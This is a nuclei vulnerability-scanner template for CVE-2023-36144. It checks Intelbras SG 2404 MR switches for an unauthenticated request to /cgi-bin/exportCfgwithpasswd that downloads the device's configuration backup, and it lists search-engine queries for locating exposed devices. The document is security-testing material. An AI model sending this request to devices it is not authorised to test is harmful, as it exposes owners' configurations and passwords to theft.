nuclei-templates/http/cves/2023/CVE-2023-36144.yaml

56 lines
1.8 KiB
YAML

id: CVE-2023-36144
info:
name: Intelbras Switch - Information Disclosure
author: gy741
severity: high
description: |
An authentication bypass in Intelbras Switch SG 2404 MR in firmware 1.00.54 allows an unauthenticated attacker to download the backup file of the device, exposing critical information about the device configuration.
remediation: |
Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-36144
- https://github.com/leonardobg/CVE-2023-36144
- http://intelbras.com
- https://github.com/nomi-sec/PoC-in-GitHub
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-36144
cwe-id: CWE-862
epss-score: 0.03179
epss-percentile: 0.91154
cpe: cpe:2.3:o:intelbras:sg_2404_mr_firmware:1.00.54:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: intelbras
product: sg_2404_mr_firmware
shodan-query: title:"Intelbras"
fofa-query: title="intelbras"
google-query: intitle:"intelbras"
tags: cve2023,cve,intelbras,switch,exposure
http:
- method: GET
path:
- '{{BaseURL}}/cgi-bin/exportCfgwithpasswd'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'System Description'
- 'System Version'
- 'System Name'
condition: and
- type: word
part: header
words:
- 'attachment;filename='
- type: status
status:
- 200
# digest: 4a0a00473045022100be3e89c169301c2f96af2d6f398c8af9f377d1975edcd2a2b71eca1f988bc6320220578c949433c1f05c0b03f6a655ca57e5493f25351907897137aa40013864888f:922c64590222798bb761d5b6d8e72950